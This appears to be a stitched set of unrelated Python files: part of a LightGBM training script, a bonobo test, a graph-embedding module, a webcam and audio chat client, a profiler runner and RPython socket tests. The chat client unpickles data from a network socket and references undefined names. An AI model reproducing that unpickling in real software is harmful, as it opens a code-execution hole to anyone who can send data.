# detail_diff_diff_diff3_basic = detail_basic_diff_diff_diff3.agg(
# ['min', 'max', 'std', 'mean', 'median'])
# detail_diff_diff_diff3_min = detail_diff_diff_diff3_basic.iloc[0, 1:8]
# detail_diff_diff_diff3_max = detail_diff_diff_diff3_basic.iloc[1, 1:8]
# detail_diff_diff_diff3_poor = detail_diff_diff_diff3_max - detail_diff_diff_diff3_min
# detail_diff_diff_diff3_std = detail_diff_diff_diff3_basic.iloc[2, 1:8]
# detail_diff_diff_diff3_mean = detail_diff_diff_diff3_basic.iloc[3, 1:8]
# detail_diff_diff_diff3_median = detail_diff_diff_diff3_basic.iloc[4, 1:8]
# detail_diff_diff_diff3_total = [
# index * detail_time for index in detail_diff_diff_diff3_mean]
# detail_diff_diff_diff3_hit = [
# index * detail_time for index in detail_diff_diff_diff3_mean]
# detail_collapse_diff_diff3_diff = [*detail_diff_diff_diff3_min, *detail_diff_diff_diff3_mean, *detail_diff_diff_diff3_max,
# *detail_diff_diff_diff3_poor, *detail_diff_diff_diff3_std, *detail_diff_diff_diff3_median,
# *detail_diff_diff_diff3_total, *detail_diff_diff_diff3_hit]
# detail_basic_pct = detail_csv.pct_change()
# detail_pct_change_basic = detail_basic_pct.agg(
# ['min', 'max', 'std', 'mean', 'median'])
# detail_pct_change_min = detail_pct_change_basic.iloc[0, 1:8]
# detail_pct_change_max = detail_pct_change_basic.iloc[1, 1:8]
# detail_pct_change_poor = detail_pct_change_max - detail_pct_change_min
# detail_pct_change_std = detail_pct_change_basic.iloc[2, 1:8]
# detail_pct_change_mean = detail_pct_change_basic.iloc[3, 1:8]
# detail_pct_change_median = detail_pct_change_basic.iloc[4, 1:8]
# detail_pct_change_total = [
# index * detail_time for index in detail_pct_change_mean]
# detail_pct_change_hit = [
# index * detail_time for index in detail_pct_change_std]
# detail_collapse_ptr = [*detail_pct_change_min, *detail_pct_change_mean, *detail_pct_change_max,
# *detail_pct_change_poor, *detail_pct_change_std, *detail_pct_change_median,
# *detail_pct_change_total, *detail_pct_change_hit]
# detail_basic_pct_diff = detail_basic_pct.diff()
# detail_pct_diff_basic = detail_basic_pct_diff.agg(
# ['min', 'max', 'std', 'mean', 'median'])
# detail_pct_diff_min = detail_pct_diff_basic.iloc[0, 1:8]
# detail_pct_diff_max = detail_pct_diff_basic.iloc[1, 1:8]
# detail_pct_diff_poor = detail_pct_diff_max - detail_pct_diff_min
# detail_pct_diff_std = detail_pct_diff_basic.iloc[2, 1:8]
# detail_pct_diff_mean = detail_pct_diff_basic.iloc[3, 1:8]
# detail_pct_diff_median = detail_pct_diff_basic.iloc[4, 1:8]
# detail_pct_diff_total = [
# index * detail_time for index in detail_pct_diff_mean]
# detail_pct_diff_hit = [
# index * detail_time for index in detail_pct_diff_std]
# detail_collapse_pct_diff = [*detail_pct_diff_min, *detail_pct_diff_mean, *detail_pct_diff_max,
# *detail_pct_diff_poor, *detail_pct_diff_std, *detail_pct_diff_median,
# *detail_pct_diff_total, *detail_pct_diff_hit]
# detail = [*detail_constant, *detail_collapse, *detail_collapse_diff,
# *detail_collapse_diff_diff, *detail_collapse_diff_diff_diff,
# *detail_collapse_ptr, *detail_collapse_pct_diff,
# *detail_collapse_diff_diff2_diff, *detail_collapse_diff_diff3_diff]
# detail = [*detail_collapse_diff_diff2_diff, *detail_collapse_diff_diff3_diff]
self.detail_map[detail_id] = ",".join(
[str(index) for index in list(detail_csv.skew()[0:8])])
# self.detail_map[detail_id] = ",".join([str(index) for index in detail])
# self.detail_map[detail_id] = detail_csv['活塞工作时长'].nunique()
def pre_data(self, pre, slices):
"""
prepare data
"""
# detail_type = pd.get_dummies(pre['设备类型'], prefix=pre[['设备类型']].columns[0])
# pre = pre.drop(['设备类型'], axis=1)
# return pd.concat([pre, detail_type], axis=1)
pre['设备类型'] = pre['设备类型'].map(
{'ZV252': 0, 'ZV573': 1, 'ZV63d': 2, 'ZVa78': 3, 'ZVa9c': 4, 'ZVe44': 4, 'ZVfd4': 5})
if slices is None:
return pre
else:
columns_total = pre.columns
if not slices:
wait_columns = [*columns_total[:128], *columns_total[188:198]]
if slices == 11:
wait_columns = [*columns_total[:128]]
elif slices == 1:
wait_columns = [*columns_total[:128], *columns_total[178:198]]
elif slices == 2:
wait_columns = [*columns_total[:128], *
columns_total[178:198], *columns_total[218:228]]
elif slices < 9:
wait_columns = [*columns_total[:128], *columns_total[178:198], *
columns_total[218:228], *columns_total[88 + slices * 10:98 + slices * 10]]
else:
wait_columns = [*columns_total[:128], *columns_total[178:198], *
columns_total[218:228], *columns_total[108 + slices * 10:118 + slices * 10]]
# columns = [*columns_total[:118], *columns_total[178:188], *columns_total[118 + slices * 10:128 + slices * 10]]
# columns = columns_total[:118] + [:118 + 10 * slices]
# wait_columns = self.good_columns
# if slices != -1:
# wait_columns = [*wait_columns, self.wait_columns[slices]]
wait = pd.DataFrame(pre, columns=wait_columns)
return wait
def load_data(self, model=True, slices=None):
"""
load data for appoint model
@param: model True-train False-predict
"""
print('Load data...')
if model:
pre = pd.read_csv(data_path + 'train_middle' + t)
target = pre['label'].values
pre = pre.drop(['label'], axis=1)
data = self.pre_data(pre, slices)
X_train, X_test, y_train, y_test = train_test_split(
data, target, test_size=0.25)
print('data split end')
# pre = pd.read_csv('concrete/data/train_middle')
# target = pre['label'].values
# pre = pre.drop(['label'], axis=1)
# X_train = self.pre_data(pre)
# y_train = target
# # X_train = self.X_train
# # y_train = self.y_train
# pre = pd.read_csv('concrete/data/submit_middle')
# target = pre['label'].values
# pre = pre.drop(['label'], axis=1)
# X_test = self.pre_data(pre)
# y_test = target
# print('data split end')
else:
pre = pd.read_csv(data_path + 'train_middle' + t)
target = pre['label'].values
pre = pre.drop(['label'], axis=1)
X_train = self.pre_data(pre, slices)
y_train = target
# X_train = self.X_train
# y_train = self.y_train
pre = pd.read_csv(data_path + 'submit_middle' + t)
target = pre['label'].values
pre = pre.drop(['label'], axis=1)
X_test = self.pre_data(pre, slices)
y_test = target
print('data split end')
self.X_test = X_test
self.X_train = X_train
self.y_test = y_test
self.y_train = y_train
def train_model(self):
"""
train model by lightgbm
"""
print('Start training...')
categorical = ['设备类型']
dtrain = lgb.Dataset(self.X_train,
label=self.y_train,
feature_name=list(self.X_train.columns),
categorical_feature=categorical)
model = lgb.train(self.params,
dtrain,
num_boost_round=self.OPT_ROUNDS,
valid_sets=[dtrain],
valid_names=['train'],
verbose_eval=100,
feval=self.evaluate_f1)
importances = pd.DataFrame({'features': model.feature_name(),
'importances': model.feature_importance()})
importances.sort_values('importances', ascending=False, inplace=True)
model.save_model('concrete/model/{}.model'.format(self.version))
importances.to_csv(
'concrete/model/{}_importances.csv'.format(self.version), index=False)
self.gbm = model
self.dtrain = dtrain
# gbm = lgb.LGBMRegressor(
# objective='regression', num_leaves=31, learning_rate=0.095, n_estimators=29)
# gbm.fit(self.X_train, self.y_train, eval_set=[
# (self.X_test, self.y_test)], eval_metric='l1', early_stopping_rounds=5)
# self.gbm = gbm
def evaulate_model(self, model=True, slices=None):
"""
evaulate model by lightgbm
"""
print('Start predicting...')
y_pred = self.gbm.predict(
self.X_test, num_iteration=self.gbm.best_iteration)
print(self.f1_max_index)
predict = [int(index > self.f1_max_index) for index in y_pred]
if model:
print(self.evaulate_model_once(self.y_test, predict))
for index in range(30, 70):
distinguish = index / 100
predict = [int(index > distinguish) for index in y_pred]
print(self.evaulate_model_once(self.y_test, predict))
else:
file_name = pd.DataFrame(list(self.id2file.values()))
result = pd.DataFrame({'sample_file_name': file_name[0], 'label': predict}, columns=[
'sample_file_name', 'label'])
result.to_csv(
prediction_path + '{}.csv'.format(self.version + str(slices)), index=False)
def evaulate_model_once(self, result, predict):
"""
print evaulate
"""
result_f1 = (self.F1(result, predict, 0) +
self.F1(result, predict, 1)) / 2
# print(result_f1)
return result_f1
@jit
def F1(self, result, predict, true_value):
"""
F1
"""
true_num = 0
recall_num = 0
precision_num = 0
for index, values in enumerate(result):
# print(index, values, predict[index])
if values == true_value:
recall_num += 1
if values == predict[index]:
true_num += 1
if predict[index] == true_value:
precision_num += 1
# print(true_num, recall_num, precision_num)
R = true_num / recall_num if recall_num else 0
P = true_num / precision_num if precision_num else 0
return (2 * P * R) / (P + R) if (P + R) else 0
def optimize_model(self, model, index=None):
"""
optimize model by lightgbm
"""
# print('Feature importances:', list(self.gbm.feature_importance()))
print(self.X_train.iloc[0, ], self.X_train.columns, len(
self.X_train.columns), self.y_train[0])
dtrain = lgb.Dataset(self.X_train,
label=self.y_train,
feature_name=list(self.X_train.columns),
categorical_feature=['设备类型'])
eval_hist = lgb.cv(self.params,
dtrain,
nfold=5,
num_boost_round=self.MAX_ROUNDS,
early_stopping_rounds=self.EARLY_STOP,
verbose_eval=50,
seed=self.seed,
shuffle=True,
feval=self.evaluate_f1,
metrics="None"
)
result = [self.version, self.X_train.columns[-1]]
result.append('best n_estimators:' + str(len(eval_hist['f1-mean'])))
result.append('best cv score:' + str(eval_hist['f1-mean'][-1]) + '\n')
with open(model_path + v + 'result', 'a') as f:
f.write('\n'.join([str(index) for index in result]))
print('best n_estimators:', len(eval_hist['f1-mean']))
print('best cv score:', eval_hist['f1-mean'][-1])
self.OPT_ROUNDS = len(eval_hist['f1-mean'])
f1_max_list = [self.f1_map[k] for k in sorted(self.f1_map.keys())]
print(self.f1_map)
f1_max_index = range(48, 53)[f1_max_list.index(max(f1_max_list))] / 100
self.f1_max_index = f1_max_index
if (eval_hist['f1-mean'][-1] > self.basic_f1):
self.basic_f1 = eval_hist['f1-mean'][-1]
if not index is None and index != -1:
self.good_columns.append(self.wait_columns[index])
with open(model_path + v + 'columns.csv', 'w') as f:
f.write(','.join([str(index) for index in self.good_columns]))
with open(model_path + v + 'lastcolumn.csv', 'w') as f:
f.write(str(self.X_train.columns[-1]))
# estimator = lgb.LGBMRegressor(num_leaves=31)
# param_grid = {
# 'learning_rate': [0.08, 0.085, 0.09, 0.095, 0.1],
# 'n_estimators': range()
# }
# gbm = GridSearchCV(estimator, param_grid,
# scoring='roc_auc', cv=5, n_jobs=20)
# gbm.fit(self.X_train, self.y_train)
# print('Best parameters found by grid search are:', gbm.best_params_)
def load_one_table(self, file_type):
"""
load one table
@param file_type: 1-submit_example, 0-train_labels
"""
pickle_file = 'submit_middle' if file_type else 'train_middle'
pickle_file += '.pickle'
detail_pickle = load_bigger(pickle_path + pickle_file)
print('load over')
def test_f1(self, num, dimension):
"""
random test f1
"""
result_list = [np.random.randint(0, 2, dimension)
for index in range(num)]
prediction_list = [np.random.randint(
0, 2, dimension) for index in range(num)]
version = begin_time()
for index in range(num):
self.F1(result_list[index], prediction_list[index], 0)
self.F1(result_list[index], prediction_list[index], 1)
end_time(version)
version = begin_time()
for index in range(num):
f1_score(result_list[index], prediction_list[index], pos_label=0)
f1_score(result_list[index], prediction_list[index], pos_label=1)
end_time(version)
def empty():
for ii, jj in test.items():
temp_max = max(jj.keys())
for kk in range(1, temp_max):
if kk not in jj:
print(ii, kk)
test[ii][kk] = {}
if __name__ == '__main__':
version = begin_time()
model = False
concrete = Concrete()
for index in range(12):
# for index in range(-1, len(concrete.wait_columns)):
concrete.load_data(model, index)
concrete.optimize_model(model, index)
concrete.train_model()
concrete.evaulate_model(model, index)
# model = False
# concrete.load_data(model)
# concrete.train_model()
# concrete.evaulate_model(model)
end_time(version)
|
test_services.py
|
import threading
import time
import pytest
from bonobo.config import Configurable, Container, Exclusive, Service, use
from bonobo.config.services import validate_service_name, create_container
from bonobo.util import get_name
class PrinterInterface():
def print(self, *args):
raise NotImplementedError()
class ConcretePrinter(PrinterInterface):
def __init__(self, prefix):
self.prefix = prefix
def print(self, *args):
return ';'.join((self.prefix, *args))
SERVICES = Container(
printer0=ConcretePrinter(prefix='0'),
printer1=ConcretePrinter(prefix='1'),
)
class MyServiceDependantConfigurable(Configurable):
printer = Service(PrinterInterface, )
def __call__(self, *args, printer: PrinterInterface):
return printer.print(*args)
def test_service_name_validator():
assert validate_service_name('foo') == 'foo'
assert validate_service_name('foo.bar') == 'foo.bar'
assert validate_service_name('Foo') == 'Foo'
assert validate_service_name('Foo.Bar') == 'Foo.Bar'
assert validate_service_name('Foo.a0') == 'Foo.a0'
with pytest.raises(ValueError):
validate_service_name('foo.0')
with pytest.raises(ValueError):
validate_service_name('0.foo')
def test_service_dependency():
o = MyServiceDependantConfigurable(printer='printer0')
assert o('foo', 'bar', printer=SERVICES.get('printer0')) == '0;foo;bar'
assert o('bar', 'baz', printer=SERVICES.get('printer1')) == '1;bar;baz'
assert o('foo', 'bar', **SERVICES.kwargs_for(o)) == '0;foo;bar'
def test_service_dependency_unavailable():
o = MyServiceDependantConfigurable(printer='printer2')
with pytest.raises(KeyError):
SERVICES.kwargs_for(o)
class VCR:
def __init__(self):
self.tape = []
def append(self, x):
return self.tape.append(x)
def test_exclusive():
vcr = VCR()
vcr.append('hello')
def record(prefix, vcr=vcr):
with Exclusive(vcr):
for i in range(5):
vcr.append(' '.join((prefix, str(i))))
time.sleep(0.05)
threads = [threading.Thread(target=record, args=(str(i), )) for i in range(5)]
for thread in threads:
thread.start()
time.sleep(0.01) # this is not good practice, how to test this without sleeping ?? XXX
for thread in threads:
thread.join()
assert vcr.tape == [
'hello', '0 0', '0 1', '0 2', '0 3', '0 4', '1 0', '1 1', '1 2', '1 3', '1 4', '2 0', '2 1', '2 2', '2 3',
'2 4', '3 0', '3 1', '3 2', '3 3', '3 4', '4 0', '4 1', '4 2', '4 3', '4 4'
]
def test_requires():
vcr = VCR()
services = Container(output=vcr.append)
@use('output')
def append(out, x):
out(x)
svcargs = services.kwargs_for(append)
assert len(svcargs) == 1
assert svcargs['output'] == vcr.append
@pytest.mark.parametrize('services', [None, {}])
def test_create_container_empty_values(services):
c = create_container(services)
assert len(c) == 2
assert 'fs' in c and get_name(c['fs']) == 'OSFS'
assert 'http' in c and get_name(c['http']) == 'requests'
def test_create_container_override():
c = create_container({
'http': 'http',
'fs': 'fs',
})
assert len(c) == 2
assert 'fs' in c and c['fs'] == 'fs'
assert 'http' in c and c['http'] == 'http'
|
rolemagnet.py
|
# coding=utf-8
import numpy as np
import networkx as nx
import queue
from .graphwave import *
import multiprocessing, time
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
from .som import SOM
def sub_graph(G, node, g, que, checked):
que.put(node)
while not que.empty():
search_adj(G, que.get(), g, que, checked)
checked.clear()
def search_adj(G, node, g, que, checked):
checked[node]=1#标记该点已搜索
for k,v in G[node].items():
g.add_weighted_edges_from([(node, k, v['weight'])])
if k not in checked:
que.put(k)
def embed(G, rev_G, sample, index, curNode):
search_queue=queue.Queue()
checked={}
# 聚图
gat = nx.Graph()
gat.add_nodes_from(G)
sub_graph(rev_G, curNode, gat, search_queue, checked)
chi_gat,_,_ = graphwave_alg(gat, sample, node=index, verbose=True)
# 散图
dif = nx.Graph()
dif.add_nodes_from(G)
sub_graph(G, curNode, dif, search_queue, checked)
chi_dif,_,_ = graphwave_alg(dif, sample, node=index, verbose=True)
# 把计算结果放入队列
chi_queue.put([index, np.concatenate((chi_gat[index],chi_dif[index]), axis=0)])
chi_queue = multiprocessing.Queue()# 子进程的输出队列
def role_magnet(G, balance=None, sample=np.linspace(0,100,25), shape=None):
'''
参数
G 图,networkx的DiGraph
balance 出入流量差
sample 采样点
shape SOM竞争层的形状
-----------------------------------
返回值
vec 节点的向量表示
role 聚类结果,key:角色代号,value:[聚类中心位置,属于该角色的成员]
label 每个点对应的角色代号
'''
rev_G = G.reverse()
# 创建子进程,每个进程计算一个点
for index,curNode in enumerate(G.nodes):
proc = multiprocessing.Process(target=embed, args=(G,rev_G,sample,index,curNode))
proc.start()
finished=0
total=len(G.nodes)
chi=np.empty((total, len(sample)*8))
count=0
character=['/','-','\\','-']
while finished != total:
# 主进程从队列接收各点的嵌入结果
while not chi_queue.empty():
res=chi_queue.get()
chi[res[0]]=res[1]
finished+=1
# 输出进度
print('Embedding: %5.2f%% %c' %(finished/total*100, character[count%4]), end='\r')
count+=1
time.sleep(1)
print()
# 降到二维,加上流量差
reduced=PCA(n_components=2).fit_transform(StandardScaler().fit_transform(chi))
vec=reduced
if not balance is None:
# 调整流量差的分布
balance=np.array(balance).reshape(len(balance),1)
chi_t=np.transpose(reduced)
balance=(max(chi_t[0])-min(chi_t[0])+max(chi_t[1])-min(chi_t[1]))/2*balance
vec=np.concatenate((reduced, balance), axis=1)
# 再降到二维
reduced=PCA(n_components=2).fit_transform(StandardScaler().fit_transform(vec))
# mid_time=time.perf_counter()
som=SOM(reduced, shape)
role,label=som.run()
return vec,role,label
|
client_tw_av.py
|
import socket, sys, cv2, pickle, struct
from threading import Thread
from datetime import datetime
from time import sleep
import matplotlib.pyplot as plt
import numpy as np
import pyaudio
sending, receiving = False, False
HEADERSIZE = 10
class myClass:
def __init__(self, name, img):
self.threads = []
self.stop = False
self.name = name
self.img = img
self.local_buffer = None
self.p = pyaudio.PyAudio()
self.stream = p.open(format=sample_format, channels=channels, rate=fs, frames_per_buffer=chunk, input=True, output=True)
def send_to_client(self, clientsocket):
cam = cv2.VideoCapture(0)
cam.set(3, 320)
cam.set(4, 240)
img_counter = 0
encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 90]
while True:
ret, frame = cam.read()
try:
result, frame = cv2.imencode('.jpg', frame, encode_param)
except:
continue
data = pickle.dumps(frame, 0)
size = len(data)
if(self.stop):
break
else:
clientsocket.sendall(bytes("{:<{}}".format(len(data), HEADERSIZE), 'utf-8') + data)
img_counter += 1
sleep(0.5)
print("Client stop sending!")
cam.release()
def receive_from_client(self, clientsocket):
print("Receiving...", receiving)
while not self.stop:
data = b""
payload_size = HEADERSIZE
msg_size = int(clientsocket.recv(HEADERSIZE))
while len(data) < msg_size:
data += clientsocket.recv(4096)
frame_data = data # [:msg_size]
if(len(frame_data)==0):
continue
frame=pickle.loads(frame_data, fix_imports=True, encoding="bytes")
frame = cv2.imdecode(frame, cv2.IMREAD_COLOR)
cv2.imshow(self.name,frame)
cv2.resizeWindow(str(clientsocket), 320, 240)
cv2.waitKey(1)
print("Receiving(stopped)...")
cv2.destroyAllWindows()
def fetchAudio(self, audio_socket):
frames = []
while not self.stop:
try:
print("getting audio....")
data = audio_socket.recv(4096)
#print("frames:", len(frames))
frames.append(data)
print(len(data))
self.stream.write(data)
except:
continue
def recordAudio(self, audio_socket):
while not self.stop:
data = self.stream.read(chunk)
audio_socket.sendall(data)
def inititate(self, clientsocket, audio_socket):
t = Thread(target=self.send_to_client, args=(clientsocket, ))
t2 = Thread(target=self.receive_from_client, args=(clientsocket, ))
t3 = Thread(target=self.show_message, args=( ))
audioSendingThread = Thread(target = self.recordAudio, args = (audio_socket,))
audioReceivingThread = Thread(target = self.fetchAudio, args = (audio_socket,))
self.stop = False
while(len(self.threads)!=2):
try:
c = int(input("1: initiate sending \n 2: initiate receiving:"))
except:
continue
if(c==1):
t.start()
audioReceivingThread.start()
self.threads.append(t)
elif(c==2):
t2.start()
audioSendingThread.start()
self.threads.append(t2)
def end(self):
self.stop = True
for t in self.threads:
t.join()
self.stream.close()
self.p.terminate()
IP = "192.168.0.108"
PORT = 1234
chunk = 1024 # Record in chunks of 1024 samples
sample_format = pyaudio.paInt16 # 16 bits per sample
channels = 2
fs = 44100 # Record at 44100 samples per second
seconds = 3
audio_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, 1222))
audio_socket.connect((IP, PORT))
plt.show()
obj = myClass(name, img)
obj.inititate(s, audio_socket)
# input("Enter to stop")
input()
obj.end()
s.close()
|
run_profiled.py
|
import argparse
import profilomatic
import profilomatic.monitor
import json
import platform
import runpy
import socket
import sys
from profilomatic.output import file_destination, no_flush_destination
def percentage(s):
if s.endswith('%'):
return float(s[:-1]) / 100.0
else:
return float(s)
parser = argparse.ArgumentParser(
description="A low-overhead sampling profiler for Python code, that takes advantage of Eliot to link actions to code"
)
parser.add_argument(
'-s', '--source-name', default=platform.node(),
help='The name of the data source - usually hostname or app name')
parser.add_argument(
'-o', '--output-file', type=argparse.FileType('w'),
help='A file where profiler output should be sent')
parser.add_argument(
'--no-flush', action='store_true',
help='Do not flush profiling data to file after writing - can reduce overhead, but risks data loss'
)
parser.add_argument(
'-i', '--output-socket', type=str,
help='A TCP address where profiler output should be sent')
parser.add_argument(
'-n', '--tasks-profiled', type=int, default=10,
help='The number of concurrent tasks that the profiler should aim to profile at once'
)
parser.add_argument(
'-v', '--max-overhead', type=percentage, default=0.02,
help='The most performance overhead the profiler is allowed to add, expressed as a fraction or percentage'
)
parser.add_argument(
'-t', '--time-granularity', type=float, default=0.1,
help='The time granularity that the profiler should try to acheive in its measurements'
)
parser.add_argument(
'-c', '--code-granularity', choices=['file', 'method', 'line'], default='line',
help='The level at which the profiler should measure performance - can be file, method, or line'
)
parser.add_argument(
'-l', '--all-logs', action='store_true',
help='Store all logs in profiler call graphs, not just action start and end messages'
)
parser.add_argument(
'-e', '--eliot', action='store_true',
help='Monkey patch eliot, to allow profiler to record remote task creation'
)
parser.add_argument(
'-x', '--monitor', action='store_true',
help='Expose profiler metric in Prometheus'
)
parser.add_argument(
'-m', action='store_true',
help='Run code as Python module'
)
parser.add_argument(
'--profile-profiler', type=argparse.FileType('w'), metavar='PROFILER_PROFILE_OUTPUT',
help='Profile the profiler itself, and output the data to the file. Mostly for dev use.'
)
parser.add_argument(
'target',
help='The file or module you would like to profile'
)
parser.add_argument(
'target_args', nargs='*',
help='Arguments for the application being profiled'
)
args = parser.parse_args()
profilomatic.configure(
source_name=args.source_name,
simultaneous_tasks_profiled=args.tasks_profiled,
max_overhead=args.max_overhead,
time_granularity=args.time_granularity,
code_granularity=args.code_granularity,
store_all_logs=args.all_logs
)
if args.eliot:
import profilomatic.eliot
profilomatic.eliot.patch()
if args.monitor:
profilomatic.monitor.enable_prometheus()
if args.output_file:
if not args.no_flush:
profilomatic.add_destination(file_destination(args.output_file))
else:
profilomatic.add_destination(no_flush_destination(args.output_file))
if args.output_socket:
host, port = args.output_socket.split(':')
port = int(port)
s = socket.socket()
s.connect((host, port))
profilomatic.add_destination(file_destination(s.makefile()))
if not (args.output_socket or args.output_file):
profilomatic.add_destination(file_destination(sys.stderr))
sys.argv = [args.target] + args.target_args
if args.profile_profiler:
from .profiler import CallGraphRoot, monotonic, generate_stack_trace
import time
import datetime
import threading
profiler_thread_id = profilomatic._instance.thread.ident
profiler_callgraph = CallGraphRoot(
profiler_thread_id,
'profile',
datetime.datetime.now(),
monotonic())
def profile_profiler():
before = monotonic()
while True:
time.sleep(0.01)
frame = sys._current_frames()[profiler_thread_id]
stack = generate_stack_trace(frame, 'line', False)
after = monotonic()
profiler_callgraph.ingest(stack, after - before, after)
before = after
profiler_profiler_thread = threading.Thread(target=profile_profiler)
profiler_profiler_thread.setDaemon(True)
profiler_profiler_thread.start()
try:
if args.m:
runpy.run_module(args.target, run_name='__main__')
else:
runpy.run_path(args.target, run_name='__main__')
finally:
profilomatic._instance.stop()
if args.profile_profiler:
args.profile_profiler.write(json.dumps(profiler_callgraph.jsonize(), indent=2))
|
test_rsocket.py
|
import py, errno, sys
from rpython.rlib import rsocket
from rpython.rlib.rsocket import *
import socket as cpy_socket
from rpython.translator.c.test.test_genc import compile
def setup_module(mod):
rsocket_startup()
def test_ipv4_addr():
a = INETAddress("localhost", 4000)
assert a.get_host() == "127.0.0.1"
assert a.get_port() == 4000
a = INETAddress("", 4001)
assert a.get_host() == "0.0.0.0"
assert a.get_port() == 4001
a = INETAddress("<broadcast>", 47002)
assert a.get_host() == "255.255.255.255"
assert a.get_port() == 47002
py.test.raises(GAIError, INETAddress, "no such host exists", 47003)
res = repr(a)
assert res == "<INETAddress 255.255.255.255:47002>"
def test_unix_addr():
if getattr(rsocket, 'AF_UNIX', None) is None:
py.test.skip('AF_UNIX not supported.')
a = UNIXAddress("/tmp/socketname")
assert a.get_path() == "/tmp/socketname"
def test_netlink_addr():
if getattr(rsocket, 'AF_NETLINK', None) is None:
py.test.skip('AF_NETLINK not supported.')
pid = 1
group_mask = 64 + 32
a = NETLINKAddress(pid, group_mask)
assert a.get_pid() == pid
assert a.get_groups() == group_mask
def test_gethostname():
s = gethostname()
assert isinstance(s, str)
def test_gethostbyname():
for host in ["localhost", "127.0.0.1"]:
a = gethostbyname(host)
assert isinstance(a, INETAddress)
assert a.get_host() == "127.0.0.1"
def test_gethostbyname_ex():
for host in ["localhost", "127.0.0.1"]:
name, aliases, address_list = gethostbyname_ex(host)
allnames = [name] + aliases
for n in allnames:
assert isinstance(n, str)
if sys.platform != 'win32':
assert host in allnames
for a in address_list:
if isinstance(a, INETAddress) and a.get_host() == "127.0.0.1":
break # ok
# no IPV6, should always return IPV4
else:
py.test.fail("could not find the localhost address in %r"
% (address_list,))
def test_gethostbyaddr():
try:
cpy_socket.gethostbyaddr("::1")
except cpy_socket.herror:
ipv6 = HSocketError
except cpy_socket.gaierror:
ipv6 = GAIError
else:
ipv6 = None
for host in ["localhost", "127.0.0.1", "::1"]:
if host == "::1" and ipv6:
with py.test.raises(ipv6):
gethostbyaddr(host)
continue
name, aliases, address_list = gethostbyaddr(host)
allnames = [name] + aliases
for n in allnames:
assert isinstance(n, str)
if sys.platform != 'win32':
assert 'localhost' in allnames or 'ip6-localhost' in allnames
for a in address_list:
if isinstance(a, INETAddress) and a.get_host() == "127.0.0.1":
break # ok
if host != '127.0.0.1': # name lookup might return IPV6
if isinstance(a, INET6Address) and a.get_host() == "::1":
break # ok
else:
py.test.fail("could not find the localhost address in %r"
% (address_list,))
def test_getservbyname():
assert getservbyname('http') == 80
assert getservbyname('http', 'tcp') == 80
def test_getservbyport():
assert getservbyport(80) == cpy_socket.getservbyport(80)
assert getservbyport(80, 'tcp') == cpy_socket.getservbyport(80)
def test_getprotobyname():
assert getprotobyname('tcp') == IPPROTO_TCP
assert getprotobyname('udp') == IPPROTO_UDP
def test_socketpair():
if sys.platform == "win32":
py.test.skip('No socketpair on Windows')
s1, s2 = socketpair()
s1.sendall('?')
buf = s2.recv(100)
assert buf == '?'
count = s2.send('x'*99)
assert 1 <= count <= 99
buf = s1.recv(100)
assert buf == 'x'*count
s1.close()
s2.close()
def test_socketpair_inheritable():
if sys.platform == "win32":
py.test.skip('No socketpair on Windows')
for inh in [False, True]:
s1, s2 = socketpair(inheritable=inh)
assert sock_get_inheritable(s1.fd) == inh
assert sock_get_inheritable(s2.fd) == inh
s1.close()
s2.close()
def test_socketpair_recvinto_1():
class Buffer:
def setslice(self, start, string):
self.x = string
def get_raw_address(self):
raise ValueError
if sys.platform == "win32":
py.test.skip('No socketpair on Windows')
s1, s2 = socketpair()
buf = Buffer()
s1.sendall('?')
n = s2.recvinto(buf, 1)
assert n == 1
assert buf.x == '?'
count = s2.send('x'*99)
assert 1 <= count <= 99
n = s1.recvinto(buf, 100)
assert n == count
assert buf.x == 'x'*count
s1.close()
s2.close()
def test_socketpair_recvinto_2():
class Buffer:
def __init__(self):
self._p = lltype.malloc(rffi.CCHARP.TO, 100, flavor='raw',
track_allocation=False)
def _as_str(self, count):
return rffi.charpsize2str(self._p, count)
def get_raw_address(self):
return self._p
if sys.platform == "win32":
py.test.skip('No socketpair on Windows')
s1, s2 = socketpair()
buf = Buffer()
s1.sendall('?')
n = s2.recvinto(buf, 1)
assert n == 1
assert buf._as_str(1) == '?'
count = s2.send('x'*99)
assert 1 <= count <= 99
n = s1.recvinto(buf, 100)
assert n == count
assert buf._as_str(n) == 'x'*count
s1.close()
s2.close()
def test_socketpair_recvfrom_into_1():
class Buffer:
def setslice(self, start, string):
self.x = string
def get_raw_address(self):
raise ValueError
if sys.platform == "win32":
py.test.skip('No socketpair on Windows')
s1, s2 = socketpair()
buf = Buffer()
s1.sendall('?')
n, addr = s2.recvfrom_into(buf, 1)
assert n == 1
assert addr is None
assert buf.x == '?'
count = s2.send('x'*99)
assert 1 <= count <= 99
n, addr = s1.recvfrom_into(buf, 100)
assert n == count
assert addr is None
assert buf.x == 'x'*count
s1.close()
s2.close()
def test_socketpair_recvfrom_into_2():
class Buffer:
def __init__(self):
self._p = lltype.malloc(rffi.CCHARP.TO, 100, flavor='raw',
track_allocation=False)
def _as_str(self, count):
return rffi.charpsize2str(self._p, count)
def get_raw_address(self):
return self._p
if sys.platform == "win32":
py.test.skip('No socketpair on Windows')
s1, s2 = socketpair()
buf = Buffer()
s1.sendall('?')
n, addr = s2.recvfrom_into(buf, 1)
assert n == 1
assert addr is None
assert buf._as_str(1) == '?'
count = s2.send('x'*99)
assert 1 <= count <= 99
n, addr = s1.recvfrom_into(buf, 100)
assert n == count
assert addr is None
assert buf._as_str(n) == 'x'*count
s1.close()
s2.close()
def test_simple_tcp():
from rpython.rlib import rthread
sock = RSocket()
try_ports = [1023] + range(20000, 30000, 437)
for port in try_ports:
print 'binding to port %d:' % (port,),
try:
sock.bind(INETAddress('127.0.0.1', port))
print 'works'
break
except SocketError as e: # should get a "Permission denied"
print e
else:
raise e
addr = INETAddress('127.0.0.1', port)
assert addr.eq(sock.getsockname())
sock.listen(1)
s2 = RSocket(AF_INET, SOCK_STREAM)
s2.settimeout(10.0) # test one side with timeouts so select is used, shouldn't affect test
connected = [False] #thread-mutable list
def connecting():
try:
s2.connect(addr)
connected[0] = True
finally:
lock.release()
lock = rthread.allocate_lock()
lock.acquire(True)
rthread.start_new_thread(connecting, ())
print 'waiting for connection'
fd1, addr2 = sock.accept()
s1 = RSocket(fd=fd1)
print 'connection accepted'
lock.acquire(True)
assert connected[0]
print 'connecting side knows that the connection was accepted too'
assert addr.eq(s2.getpeername())
#assert addr2.eq(s2.getsockname())
